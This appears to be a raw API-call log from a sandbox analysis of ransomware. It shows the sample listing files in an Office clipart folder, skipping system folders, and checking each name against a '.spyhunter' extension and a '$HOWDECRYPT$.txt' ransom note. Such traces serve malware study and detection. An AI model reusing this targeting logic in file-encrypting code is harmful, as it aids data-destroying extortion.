out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0097.034] StrStrIW (lpFirst="AN04385_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.034] lstrcmpW (lpString1="AN04385_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.034] lstrcmpW (lpString1="AN04385_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.034] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 67 [0097.034] GetProcessHeap () returned 0x2c0000 [0097.034] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34b730 [0097.034] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x16f8) returned 0x2c310e0 [0097.034] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.034] lstrcmpiW (lpString1="BABY_01.MID", lpString2="Windows") returned -1 [0097.034] lstrlenW (lpString="Windows") returned 7 [0097.034] lstrcmpiW (lpString1="BABY_01.MID", lpString2="$Recycle.bin") returned 1 [0097.034] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.034] lstrcmpiW (lpString1="BABY_01.MID", lpString2="System Volume Information") returned -1 [0097.034] lstrlenW (lpString="System Volume Information") returned 25 [0097.034] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0097.034] StrStrIW (lpFirst="BABY_01.MID", lpSrch=".spyhunter") returned 0x0 [0097.034] lstrcmpW (lpString1="BABY_01.MID", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.035] lstrcmpW (lpString1="BABY_01.MID", lpString2="_uninstalling_.png") returned 1 [0097.035] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BABY_01.MID") returned 66 [0097.035] GetProcessHeap () returned 0x2c0000 [0097.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc6) returned 0x34e8d8 [0097.035] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1700) returned 0x2c310e0 [0097.035] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.035] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="Windows") returned -1 [0097.035] lstrlenW (lpString="Windows") returned 7 [0097.035] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="$Recycle.bin") returned 1 [0097.035] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.035] lstrcmpiW (lpString1="BD00116_.WMF", lpString2="System Volume Information") returned -1 [0097.035] lstrlenW (lpString="System Volume Information") returned 25 [0097.035] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0097.035] StrStrIW (lpFirst="BD00116_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.035] lstrcmpW (lpString1="BD00116_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.035] lstrcmpW (lpString1="BD00116_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.035] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 67 [0097.035] GetProcessHeap () returned 0x2c0000 [0097.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34e9a8 [0097.035] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1708) returned 0x2c310e0 [0097.035] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.035] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="Windows") returned -1 [0097.035] lstrlenW (lpString="Windows") returned 7 [0097.035] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="$Recycle.bin") returned 1 [0097.036] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.036] lstrcmpiW (lpString1="BD00141_.WMF", lpString2="System Volume Information") returned -1 [0097.036] lstrlenW (lpString="System Volume Information") returned 25 [0097.036] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0097.036] StrStrIW (lpFirst="BD00141_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.036] lstrcmpW (lpString1="BD00141_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.036] lstrcmpW (lpString1="BD00141_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.036] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 67 [0097.036] GetProcessHeap () returned 0x2c0000 [0097.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ea78 [0097.036] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1710) returned 0x2c310e0 [0097.036] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.036] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="Windows") returned -1 [0097.036] lstrlenW (lpString="Windows") returned 7 [0097.036] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="$Recycle.bin") returned 1 [0097.036] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.036] lstrcmpiW (lpString1="BD00146_.WMF", lpString2="System Volume Information") returned -1 [0097.036] lstrlenW (lpString="System Volume Information") returned 25 [0097.036] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0097.036] StrStrIW (lpFirst="BD00146_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.036] lstrcmpW (lpString1="BD00146_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.036] lstrcmpW (lpString1="BD00146_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.036] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 67 [0097.037] GetProcessHeap () returned 0x2c0000 [0097.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34eb48 [0097.037] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1718) returned 0x2c310e0 [0097.037] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.037] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="Windows") returned -1 [0097.037] lstrlenW (lpString="Windows") returned 7 [0097.037] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="$Recycle.bin") returned 1 [0097.037] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.037] lstrcmpiW (lpString1="BD00155_.WMF", lpString2="System Volume Information") returned -1 [0097.037] lstrlenW (lpString="System Volume Information") returned 25 [0097.037] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 67 [0097.038] StrStrIW (lpFirst="BD00155_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.038] lstrcmpW (lpString1="BD00155_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.038] lstrcmpW (lpString1="BD00155_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.038] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 67 [0097.038] GetProcessHeap () returned 0x2c0000 [0097.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ec18 [0097.038] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1720) returned 0x2c310e0 [0097.038] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.038] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="Windows") returned -1 [0097.038] lstrlenW (lpString="Windows") returned 7 [0097.038] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="$Recycle.bin") returned 1 [0097.038] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.038] lstrcmpiW (lpString1="BD00160_.WMF", lpString2="System Volume Information") returned -1 [0097.038] lstrlenW (lpString="System Volume Information") returned 25 [0097.038] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0097.038] StrStrIW (lpFirst="BD00160_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.038] lstrcmpW (lpString1="BD00160_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.039] lstrcmpW (lpString1="BD00160_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 67 [0097.039] GetProcessHeap () returned 0x2c0000 [0097.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ece8 [0097.039] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1728) returned 0x2c310e0 [0097.039] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.039] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="Windows") returned -1 [0097.039] lstrlenW (lpString="Windows") returned 7 [0097.039] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="$Recycle.bin") returned 1 [0097.039] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.039] lstrcmpiW (lpString1="BD00173_.WMF", lpString2="System Volume Information") returned -1 [0097.039] lstrlenW (lpString="System Volume Information") returned 25 [0097.039] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0097.039] StrStrIW (lpFirst="BD00173_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.039] lstrcmpW (lpString1="BD00173_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.039] lstrcmpW (lpString1="BD00173_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.039] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 67 [0097.039] GetProcessHeap () returned 0x2c0000 [0097.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34edb8 [0097.039] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1730) returned 0x2c310e0 [0097.039] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.039] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="Windows") returned -1 [0097.039] lstrlenW (lpString="Windows") returned 7 [0097.040] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="$Recycle.bin") returned 1 [0097.040] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.043] lstrcmpiW (lpString1="BD05119_.WMF", lpString2="System Volume Information") returned -1 [0097.043] lstrlenW (lpString="System Volume Information") returned 25 [0097.043] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 67 [0097.043] StrStrIW (lpFirst="BD05119_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.043] lstrcmpW (lpString1="BD05119_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.043] lstrcmpW (lpString1="BD05119_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.043] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 67 [0097.043] GetProcessHeap () returned 0x2c0000 [0097.043] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ee88 [0097.043] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1738) returned 0x2c310e0 [0097.043] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.043] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="Windows") returned -1 [0097.043] lstrlenW (lpString="Windows") returned 7 [0097.043] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="$Recycle.bin") returned 1 [0097.043] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.044] lstrcmpiW (lpString1="BD06102_.WMF", lpString2="System Volume Information") returned -1 [0097.044] lstrlenW (lpString="System Volume Information") returned 25 [0097.044] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0097.044] StrStrIW (lpFirst="BD06102_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.044] lstrcmpW (lpString1="BD06102_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.044] lstrcmpW (lpString1="BD06102_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06102_.WMF") returned 67 [0097.044] GetProcessHeap () returned 0x2c0000 [0097.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34ef58 [0097.044] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1740) returned 0x2c310e0 [0097.044] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.044] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="Windows") returned -1 [0097.044] lstrlenW (lpString="Windows") returned 7 [0097.044] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="$Recycle.bin") returned 1 [0097.044] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.044] lstrcmpiW (lpString1="BD06200_.WMF", lpString2="System Volume Information") returned -1 [0097.044] lstrlenW (lpString="System Volume Information") returned 25 [0097.044] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0097.044] StrStrIW (lpFirst="BD06200_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.044] lstrcmpW (lpString1="BD06200_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.044] lstrcmpW (lpString1="BD06200_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.044] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD06200_.WMF") returned 67 [0097.044] GetProcessHeap () returned 0x2c0000 [0097.044] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f028 [0097.045] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1748) returned 0x2c310e0 [0097.045] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.045] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="Windows") returned -1 [0097.045] lstrlenW (lpString="Windows") returned 7 [0097.045] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="$Recycle.bin") returned 1 [0097.045] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.045] lstrcmpiW (lpString1="BD07761_.WMF", lpString2="System Volume Information") returned -1 [0097.045] lstrlenW (lpString="System Volume Information") returned 25 [0097.045] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0097.045] StrStrIW (lpFirst="BD07761_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.045] lstrcmpW (lpString1="BD07761_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.045] lstrcmpW (lpString1="BD07761_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.045] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 67 [0097.045] GetProcessHeap () returned 0x2c0000 [0097.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f0f8 [0097.045] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1750) returned 0x2c310e0 [0097.045] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.045] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="Windows") returned -1 [0097.045] lstrlenW (lpString="Windows") returned 7 [0097.045] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="$Recycle.bin") returned 1 [0097.046] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.046] lstrcmpiW (lpString1="BD07804_.WMF", lpString2="System Volume Information") returned -1 [0097.046] lstrlenW (lpString="System Volume Information") returned 25 [0097.046] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0097.046] StrStrIW (lpFirst="BD07804_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.046] lstrcmpW (lpString1="BD07804_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.046] lstrcmpW (lpString1="BD07804_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.046] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07804_.WMF") returned 67 [0097.046] GetProcessHeap () returned 0x2c0000 [0097.046] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f1c8 [0097.046] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1758) returned 0x2c310e0 [0097.046] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.046] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="Windows") returned -1 [0097.046] lstrlenW (lpString="Windows") returned 7 [0097.046] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="$Recycle.bin") returned 1 [0097.046] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.046] lstrcmpiW (lpString1="BD07831_.WMF", lpString2="System Volume Information") returned -1 [0097.046] lstrlenW (lpString="System Volume Information") returned 25 [0097.046] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0097.046] StrStrIW (lpFirst="BD07831_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.046] lstrcmpW (lpString1="BD07831_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.046] lstrcmpW (lpString1="BD07831_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.046] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF") returned 67 [0097.047] GetProcessHeap () returned 0x2c0000 [0097.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f298 [0097.047] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1760) returned 0x2c310e0 [0097.047] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.047] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="Windows") returned -1 [0097.047] lstrlenW (lpString="Windows") returned 7 [0097.047] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="$Recycle.bin") returned 1 [0097.047] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.047] lstrcmpiW (lpString1="BD08758_.WMF", lpString2="System Volume Information") returned -1 [0097.047] lstrlenW (lpString="System Volume Information") returned 25 [0097.047] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0097.047] StrStrIW (lpFirst="BD08758_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.047] lstrcmpW (lpString1="BD08758_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.047] lstrcmpW (lpString1="BD08758_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.047] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned 67 [0097.047] GetProcessHeap () returned 0x2c0000 [0097.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f368 [0097.047] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1768) returned 0x2c310e0 [0097.047] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.047] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="Windows") returned -1 [0097.047] lstrlenW (lpString="Windows") returned 7 [0097.047] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="$Recycle.bin") returned 1 [0097.047] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.048] lstrcmpiW (lpString1="BD08773_.WMF", lpString2="System Volume Information") returned -1 [0097.048] lstrlenW (lpString="System Volume Information") returned 25 [0097.048] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0097.048] StrStrIW (lpFirst="BD08773_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.048] lstrcmpW (lpString1="BD08773_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.048] lstrcmpW (lpString1="BD08773_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.048] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 67 [0097.048] GetProcessHeap () returned 0x2c0000 [0097.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f438 [0097.048] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1770) returned 0x2c310e0 [0097.048] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.048] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="Windows") returned -1 [0097.048] lstrlenW (lpString="Windows") returned 7 [0097.048] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="$Recycle.bin") returned 1 [0097.048] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.048] lstrcmpiW (lpString1="BD08808_.WMF", lpString2="System Volume Information") returned -1 [0097.048] lstrlenW (lpString="System Volume Information") returned 25 [0097.048] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0097.048] StrStrIW (lpFirst="BD08808_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.048] lstrcmpW (lpString1="BD08808_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.048] lstrcmpW (lpString1="BD08808_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.048] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08808_.WMF") returned 67 [0097.048] GetProcessHeap () returned 0x2c0000 [0097.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f508 [0097.049] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1778) returned 0x2c310e0 [0097.049] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.049] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="Windows") returned -1 [0097.049] lstrlenW (lpString="Windows") returned 7 [0097.049] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="$Recycle.bin") returned 1 [0097.049] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.049] lstrcmpiW (lpString1="BD08868_.WMF", lpString2="System Volume Information") returned -1 [0097.049] lstrlenW (lpString="System Volume Information") returned 25 [0097.049] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0097.049] StrStrIW (lpFirst="BD08868_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.049] lstrcmpW (lpString1="BD08868_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.049] lstrcmpW (lpString1="BD08868_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.049] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08868_.WMF") returned 67 [0097.049] GetProcessHeap () returned 0x2c0000 [0097.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f5d8 [0097.049] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1780) returned 0x2c310e0 [0097.049] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.049] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="Windows") returned -1 [0097.049] lstrlenW (lpString="Windows") returned 7 [0097.049] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="$Recycle.bin") returned 1 [0097.049] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.050] lstrcmpiW (lpString1="BD09031_.WMF", lpString2="System Volume Information") returned -1 [0097.050] lstrlenW (lpString="System Volume Information") returned 25 [0097.050] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0097.050] StrStrIW (lpFirst="BD09031_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.050] lstrcmpW (lpString1="BD09031_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 [0097.050] lstrcmpW (lpString1="BD09031_.WMF", lpString2="_uninstalling_.png") returned 1 [0097.050] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09031_.WMF") returned 67 [0097.050] GetProcessHeap () returned 0x2c0000 [0097.050] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xc8) returned 0x34f6a8 [0097.050] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x2c310e0, Size=0x1788) returned 0x2c310e0 [0097.050] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0097.050] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="Windows") returned -1 [0097.050] lstrlenW (lpString="Windows") returned 7 [0097.050] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="$Recycle.bin") returned 1 [0097.050] lstrlenW (lpString="$Recycle.bin") returned 12 [0097.050] lstrcmpiW (lpString1="BD09194_.WMF", lpString2="System Volume Information") returned -1 [0097.050] lstrlenW (lpString="System Volume Information") returned 25 [0097.050] wnsprintfW (in: pszDest=0x30efc0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD09194_.WMF") returned 67 [0097.050] StrStrIW (lpFirst="BD09194_.WMF", lpSrch=".spyhunter") returned 0x0 [0097.050] lstrcmpW (lpString1="BD09194_.WMF", lpString2="$HOWDECRYPT$.txt") returned 1 